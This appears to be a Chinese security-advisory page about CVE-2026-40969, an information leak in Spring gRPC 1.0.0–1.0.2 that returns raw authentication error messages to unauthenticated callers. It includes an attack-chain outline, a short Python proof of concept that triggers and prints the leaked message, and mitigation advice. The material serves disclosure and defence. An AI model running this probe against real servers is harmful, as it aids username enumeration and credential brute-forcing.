CVE-2026-40969 CVSS 3.7 低危

CVE-2026-40969 Spring gRPC认证异常信息泄露漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40969

漏洞类型

信息泄露

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Spring gRPC

漏洞概述

Spring gRPC 在处理服务端认证异常时存在信息泄露漏洞。当认证失败发生时，系统会将原始的异常消息直接通过 gRPC 状态描述返回给未认证的远程调用者。这种处理方式使得攻击者能够通过构造恶意请求并分析返回的错误信息，获取关于认证失败原因的敏感细节。这些信息可能被用于枚举用户名或探测系统配置，从而为后续的针对性攻击提供便利，增加了系统的安全风险。

技术细节

该漏洞的根源在于 Spring gRPC 框架的错误处理机制存在缺陷。当服务端抛出 AuthenticationException 时，框架未对异常消息进行脱敏处理，而是直接将其作为 gRPC 状态描述返回给客户端。在 gRPC 通信协议中，Status 的 description 字段通常用于调试，但此处暴露了内部逻辑。攻击者无需拥有任何凭证（PR:N），只需向受影响端点发送常规请求，即可触发异常并捕获响应。攻击者可批量探测服务器，通过分析泄露的具体报错信息（如“用户不存在”或“密码错误”），大幅提升暴力破解或凭证撞库的成功率，对系统的机密性构成潜在威胁。

攻击链分析

STEP 1

步骤1：侦察

攻击者识别目标系统正在使用 Spring gRPC 框架，并确定需要认证的 gRPC 服务端点。

STEP 2

步骤2：建立连接

攻击者无需进行身份验证，直接向目标 gRPC 服务端口发起连接请求。

STEP 3

步骤3：触发异常

攻击者调用受保护的方法但不提供认证凭据（或提供无效凭据），故意触发服务端的 AuthenticationException。

STEP 4

步骤4：信息提取

攻击者捕获 gRPC 响应中的 Status Description 字段，提取原始异常消息，分析认证失败的具体原因。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import grpc

# Target vulnerable gRPC server address
TARGET_SERVER = "localhost:9090"

# This PoC demonstrates the information leak by triggering an authentication failure
# without providing valid credentials.
def check_info_leak():
    # Create an insecure channel to the target
    with grpc.insecure_channel(TARGET_SERVER) as channel:
        # In a real scenario, create a stub from the generated proto files
        # Here we simulate a generic call that requires authentication
        try:
            # Attempt to call a protected method without metadata/token
            # This triggers the server-side AuthenticationException
            stub = channel.unary_unary(
                '/service.path/SecureMethod',
                request_serializer=bytes,
                response_deserializer=bytes
            )
            response = stub(b"test_payload")
        except grpc.RpcError as e:
            # The vulnerability: Raw exception message is exposed in details()
            print(f"[+] Status Code: {e.code()}")
            print(f"[+] Leaked Authentication Info: {e.details()}")
            
if __name__ == "__main__":
    check_info_leak()

影响范围

Spring gRPC 1.0.0 - 1.0.2

Older unsupported versions

防御指南

临时缓解措施

如果无法立即升级版本，建议在应用程序中实现全局的 gRPC 拦截器。捕获所有的 AuthenticationException，并将其替换为通用的错误消息（例如“认证失败”或“Access Denied”），严禁将异常堆栈或原始消息直接返回给调用方。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-40969
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-40969
3 Details https://www.cvedetails.com/cve/CVE-2026-40969/
4 VulDB https://vuldb.com/cve/CVE-2026-40969
5 Link https://spring.io/security/cve-2026-40969

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表